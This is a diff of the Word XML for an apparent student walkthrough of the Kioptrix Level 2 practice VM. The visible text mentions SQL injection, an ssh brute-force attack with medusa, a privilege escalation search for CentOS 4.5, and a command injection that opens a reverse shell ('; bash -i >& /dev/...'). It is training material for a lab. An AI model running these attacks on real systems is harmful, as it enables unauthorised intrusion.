<commit_message>
Complete the Kioptrix Level 2 Assignment
</commit_message>
<xml_diff>
--- a/Web Security/Module 6/Assignment/Kioptrix Level 2/Kioptrix Level 2.docx
+++ b/Web Security/Module 6/Assignment/Kioptrix Level 2/Kioptrix Level 2.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -571,9 +571,9 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:group w14:anchorId="6967BC9F" id="Group 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:.1pt;width:441.6pt;height:241.75pt;z-index:251661312" coordsize="56085,30701" o:gfxdata="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">
-                <v:group id="Group 11" o:spid="_x0000_s1027" style="position:absolute;width:56085;height:30701" coordsize="56085,30701" o:gfxdata="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">
-                  <v:rect id="Rectangle 13" o:spid="_x0000_s1028" style="position:absolute;left:12524;width:43561;height:30701;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
+              <v:group w14:anchorId="6967BC9F" id="Group 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:.1pt;width:441.6pt;height:241.75pt;z-index:251661312" coordsize="56085,30701" o:gfxdata="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">
+                <v:group id="Group 11" o:spid="_x0000_s1027" style="position:absolute;width:56085;height:30701" coordsize="56085,30701" o:gfxdata="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">
+                  <v:rect id="Rectangle 13" o:spid="_x0000_s1028" style="position:absolute;left:12524;width:43561;height:30701;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                     <v:textbox>
                       <w:txbxContent>
                         <w:p>
@@ -590,7 +590,7 @@
                       </w:txbxContent>
                     </v:textbox>
                   </v:rect>
-                  <v:rect id="Rectangle 14" o:spid="_x0000_s1029" style="position:absolute;left:17681;top:5157;width:36058;height:20272;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" fillcolor="#ed7d31 [3205]" strokecolor="#823b0b [1605]" strokeweight="1pt">
+                  <v:rect id="Rectangle 14" o:spid="_x0000_s1029" style="position:absolute;left:17681;top:5157;width:36058;height:20272;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" fillcolor="#ed7d31 [3205]" strokecolor="#823b0b [1605]" strokeweight="1pt">
                     <v:textbox>
                       <w:txbxContent>
                         <w:p>
@@ -610,7 +610,7 @@
                       </w:txbxContent>
                     </v:textbox>
                   </v:rect>
-                  <v:rect id="Rectangle 15" o:spid="_x0000_s1030" style="position:absolute;left:25091;top:23965;width:20359;height:3450;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" fillcolor="#70ad47 [3209]" strokecolor="#375623 [1609]" strokeweight="1pt">
+                  <v:rect id="Rectangle 15" o:spid="_x0000_s1030" style="position:absolute;left:25091;top:23965;width:20359;height:3450;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" fillcolor="#70ad47 [3209]" strokecolor="#375623 [1609]" strokeweight="1pt">
                     <v:textbox>
                       <w:txbxContent>
                         <w:p>
@@ -635,10 +635,10 @@
                     </v:handles>
                     <o:lock v:ext="edit" shapetype="t"/>
                   </v:shapetype>
-                  <v:shape id="Elbow Connector 16" o:spid="_x0000_s1031" type="#_x0000_t34" style="position:absolute;left:40476;top:2816;width:3708;height:23550;visibility:visible;mso-wrap-style:square" o:connectortype="elbow" o:gfxdata="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" adj="84747" strokecolor="black [3200]" strokeweight="2pt">
+                  <v:shape id="Elbow Connector 16" o:spid="_x0000_s1031" type="#_x0000_t34" style="position:absolute;left:40476;top:2816;width:3708;height:23550;visibility:visible;mso-wrap-style:square" o:connectortype="elbow" o:gfxdata="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" adj="84747" strokecolor="black [3200]" strokeweight="2pt">
                     <v:stroke startarrow="block" endarrow="block"/>
                   </v:shape>
-                  <v:rect id="Rectangle 17" o:spid="_x0000_s1032" style="position:absolute;left:38569;top:11050;width:10863;height:7068;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" fillcolor="black [3200]" strokecolor="black [1600]" strokeweight="1pt">
+                  <v:rect id="Rectangle 17" o:spid="_x0000_s1032" style="position:absolute;left:38569;top:11050;width:10863;height:7068;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" fillcolor="black [3200]" strokecolor="black [1600]" strokeweight="1pt">
                     <v:textbox>
                       <w:txbxContent>
                         <w:p>
@@ -652,7 +652,7 @@
                       </w:txbxContent>
                     </v:textbox>
                   </v:rect>
-                  <v:rect id="Rectangle 18" o:spid="_x0000_s1033" style="position:absolute;left:23965;top:11050;width:8108;height:7074;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" fillcolor="#c3c3c3 [2166]" strokecolor="#a5a5a5 [3206]" strokeweight=".5pt">
+                  <v:rect id="Rectangle 18" o:spid="_x0000_s1033" style="position:absolute;left:23965;top:11050;width:8108;height:7074;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" fillcolor="#c3c3c3 [2166]" strokecolor="#a5a5a5 [3206]" strokeweight=".5pt">
                     <v:fill color2="#b6b6b6 [2614]" rotate="t" colors="0 #d2d2d2;.5 #c8c8c8;1 silver" focus="100%" type="gradient">
                       <o:fill v:ext="view" type="gradientUnscaled"/>
                     </v:fill>
@@ -675,7 +675,7 @@
                       </w:txbxContent>
                     </v:textbox>
                   </v:rect>
-                  <v:shape id="Cloud 19" o:spid="_x0000_s1034" style="position:absolute;top:9664;width:15355;height:14061;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="43200,43200" o:spt="100" o:gfxdata="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" adj="-11796480,,5400" path="m3900,14370c3629,11657,4261,8921,5623,6907,7775,3726,11264,3017,14005,5202,15678,909,19914,22,22456,3432,23097,1683,24328,474,25749,200v1564,-302,3126,570,4084,2281c31215,267,33501,-460,35463,690v1495,876,2567,2710,2855,4886c40046,6218,41422,7998,41982,10318v407,1684,349,3513,-164,5142c43079,17694,43520,20590,43016,23322v-670,3632,-2888,6352,-5612,6882c37391,32471,36658,34621,35395,36101v-1919,2249,-4691,2538,-6840,714c27860,39948,25999,42343,23667,43106v-2748,899,-5616,-633,-7187,-3840c12772,42310,7956,40599,5804,35472,3690,35809,1705,34024,1110,31250,679,29243,1060,27077,2113,25551,619,24354,-213,22057,-5,19704,239,16949,1845,14791,3863,14507v12,-46,25,-91,37,-137xem4693,26177nfc3809,26271,2925,25993,2160,25380t4768,9519nfc6573,35092,6200,35220,5820,35280t10658,3810nfc16211,38544,15987,37961,15810,37350m28827,34751nfc28788,35398,28698,36038,28560,36660m34129,22954nfc36133,24282,37398,27058,37380,30090m41798,15354nfc41473,16386,40978,17302,40350,18030m38324,5426nfc38379,5843,38405,6266,38400,6690m29078,3952nfc29267,3369,29516,2826,29820,2340m22141,4720nfc22218,4238,22339,3771,22500,3330m14000,5192nfc14472,5568,14908,6021,15300,6540m4127,15789nfc4024,15325,3948,14851,3900,14370e" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
+                  <v:shape id="Cloud 19" o:spid="_x0000_s1034" style="position:absolute;top:9664;width:15355;height:14061;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="43200,43200" o:spt="100" o:gfxdata="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" adj="-11796480,,5400" path="m3900,14370c3629,11657,4261,8921,5623,6907,7775,3726,11264,3017,14005,5202,15678,909,19914,22,22456,3432,23097,1683,24328,474,25749,200v1564,-302,3126,570,4084,2281c31215,267,33501,-460,35463,690v1495,876,2567,2710,2855,4886c40046,6218,41422,7998,41982,10318v407,1684,349,3513,-164,5142c43079,17694,43520,20590,43016,23322v-670,3632,-2888,6352,-5612,6882c37391,32471,36658,34621,35395,36101v-1919,2249,-4691,2538,-6840,714c27860,39948,25999,42343,23667,43106v-2748,899,-5616,-633,-7187,-3840c12772,42310,7956,40599,5804,35472,3690,35809,1705,34024,1110,31250,679,29243,1060,27077,2113,25551,619,24354,-213,22057,-5,19704,239,16949,1845,14791,3863,14507v12,-46,25,-91,37,-137xem4693,26177nfc3809,26271,2925,25993,2160,25380t4768,9519nfc6573,35092,6200,35220,5820,35280t10658,3810nfc16211,38544,15987,37961,15810,37350m28827,34751nfc28788,35398,28698,36038,28560,36660m34129,22954nfc36133,24282,37398,27058,37380,30090m41798,15354nfc41473,16386,40978,17302,40350,18030m38324,5426nfc38379,5843,38405,6266,38400,6690m29078,3952nfc29267,3369,29516,2826,29820,2340m22141,4720nfc22218,4238,22339,3771,22500,3330m14000,5192nfc14472,5568,14908,6021,15300,6540m4127,15789nfc4024,15325,3948,14851,3900,14370e" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                     <v:stroke joinstyle="miter"/>
                     <v:formulas/>
                     <v:path arrowok="t" o:connecttype="custom" o:connectlocs="166808,852028;76775,826087;246249,1135918;206866,1148319;585694,1272330;561951,1215695;1024628,1131101;1015137,1193236;1213082,747123;1328636,979391;1485669,499753;1434202,586854;1362189,176609;1364891,217751;1033549,128633;1059923,76164;786980,153630;799741,108387;497616,168993;543824,212869;146690,513912;138622,467725" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0" textboxrect="0,0,43200,43200"/>
@@ -702,17 +702,17 @@
                     <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                     <o:lock v:ext="edit" shapetype="t"/>
                   </v:shapetype>
-                  <v:shape id="Straight Arrow Connector 20" o:spid="_x0000_s1035" type="#_x0000_t32" style="position:absolute;left:28905;top:16901;width:4311;height:7848;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokecolor="black [3200]" strokeweight="1.5pt">
+                  <v:shape id="Straight Arrow Connector 20" o:spid="_x0000_s1035" type="#_x0000_t32" style="position:absolute;left:28905;top:16901;width:4311;height:7848;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokecolor="black [3200]" strokeweight="1.5pt">
                     <v:stroke endarrow="block" joinstyle="miter"/>
                   </v:shape>
-                  <v:shape id="Straight Arrow Connector 21" o:spid="_x0000_s1036" type="#_x0000_t32" style="position:absolute;left:9837;top:16814;width:15872;height:2502;flip:x;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokecolor="black [3200]" strokeweight="1.5pt">
+                  <v:shape id="Straight Arrow Connector 21" o:spid="_x0000_s1036" type="#_x0000_t32" style="position:absolute;left:9837;top:16814;width:15872;height:2502;flip:x;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokecolor="black [3200]" strokeweight="1.5pt">
                     <v:stroke endarrow="block" joinstyle="miter"/>
                   </v:shape>
-                  <v:shape id="Straight Arrow Connector 22" o:spid="_x0000_s1037" type="#_x0000_t32" style="position:absolute;left:43033;top:17767;width:4142;height:7504;flip:x;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokecolor="black [3200]" strokeweight="1.5pt">
+                  <v:shape id="Straight Arrow Connector 22" o:spid="_x0000_s1037" type="#_x0000_t32" style="position:absolute;left:43033;top:17767;width:4142;height:7504;flip:x;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokecolor="black [3200]" strokeweight="1.5pt">
                     <v:stroke endarrow="block" joinstyle="miter"/>
                   </v:shape>
                 </v:group>
-                <v:rect id="Rectangle 23" o:spid="_x0000_s1038" style="position:absolute;left:16668;top:16189;width:6000;height:4766;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" filled="f" stroked="f" strokeweight="1pt">
+                <v:rect id="Rectangle 23" o:spid="_x0000_s1038" style="position:absolute;left:16668;top:16189;width:6000;height:4766;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" filled="f" stroked="f" strokeweight="1pt">
                   <v:textbox>
                     <w:txbxContent>
                       <w:p>
@@ -749,15 +749,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">/share/wordlists folder, and if you are happy, you should clone </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>this</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> so you have a clean copy ready to go.  </w:t>
+        <w:t xml:space="preserve">/share/wordlists folder, and if you are happy, you should clone this so you have a clean copy ready to go.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1125,7 +1117,13 @@
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
-        <w:t>Let’s try a simple SQL Injection:</w:t>
+        <w:t xml:space="preserve">Let’s try </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>a simple SQL Injection:</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1212,15 +1210,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">/passwd file, and engage a targeted </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> login attack using medusa.</w:t>
+        <w:t>/passwd file, and engage a targeted ssh login attack using medusa.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1374,7 +1364,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>We are also going to try the following command injection chain in the browser</w:t>
+        <w:t xml:space="preserve">We are also going to try the following </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>command injection</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> chain in the browser</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, substituting the IP address for your </w:t>
@@ -1398,7 +1397,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>; bash -i &gt;&amp; /dev/</w:t>
+        <w:t>; bash -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1548,15 +1561,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> generated payload earlier, we create a remote shell running on the Kali machine connected to the vulnerable machine.  The browser sits trying to load a page, and the server </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>opens up</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the remote shell.  Once running as below, type in </w:t>
+        <w:t xml:space="preserve"> generated payload earlier, we create a remote shell running on the Kali machine connected to the vulnerable machine.  The browser sits trying to load a page, and the server opens up the remote shell.  Once running as below, type in </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1694,15 +1699,16 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">It will show that our vulnerable system is running </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>CenOS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> v4.5.  This is subject to an escalation vulnerability</w:t>
+        <w:t xml:space="preserve">It will show that our vulnerable system is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>running CenOS v4.5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  This is subject to an escalation vulnerability</w:t>
       </w:r>
       <w:r>
         <w:t>.  We can search for vulnerabilities around this with the following.  I advise starting a new terminal window or tab, so you can switch back and forth between Kali and the vulnerable server:</w:t>
@@ -1831,15 +1837,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">To download anything from our Kali, we need to enable a way to download from Kali.  By default, Kali blocks all this kind of access, it is designed to be secure as possible for a system that has you run everything as root.  We can turn on temp services (apache2, ftp, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/sftp) or we can launch a temporary web server using Python.  With the Python option, it creates a web server, and whatever directory you execute it from becomes the document root of the web server.  As such, we are going to create a directory (I called my Kioptrix_2), copy the above file to that directory (as below) and then start the Python web server with the following command:</w:t>
+        <w:t>To download anything from our Kali, we need to enable a way to download from Kali.  By default, Kali blocks all this kind of access, it is designed to be secure as possible for a system that has you run everything as root.  We can turn on temp services (apache2, ftp, ssh/sftp) or we can launch a temporary web server using Python.  With the Python option, it creates a web server, and whatever directory you execute it from becomes the document root of the web server.  As such, we are going to create a directory (I called my Kioptrix_2), copy the above file to that directory (as below) and then start the Python web server with the following command:</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2207,7 +2205,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -2232,7 +2230,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" 